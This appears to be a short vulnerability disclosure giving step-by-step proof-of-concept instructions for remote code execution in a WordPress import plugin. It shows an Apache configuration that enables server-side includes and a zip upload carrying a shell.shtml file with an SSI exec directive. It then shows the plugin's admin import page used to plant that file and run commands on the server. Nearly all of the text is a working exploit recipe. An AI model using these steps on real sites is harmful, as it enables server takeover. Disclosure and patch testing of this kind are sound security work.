1. Configure the Apache server with mod_include and mod_cgi enabled, and enable server-side includes:

      Options Includes
      AddType text/html .shtml
      AddOutputFilter INCLUDES .shtml

2. Create a zip file including a CSV file and a file `shell.shtml` with the following contents:

<!--#exec cmd="id" -->

3. As a site administrator on a multisite instance, visit /wp-admin/admin.php?page=pmxi-admin-import

4. Click "Upload a file" and choose the zip file created previously.

5. View the response of the AJAX request to /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=... to find the directory of the uploaded zip file.

6. Directly access `shell.shtml` (e.g. at ``) to trigger the RCE.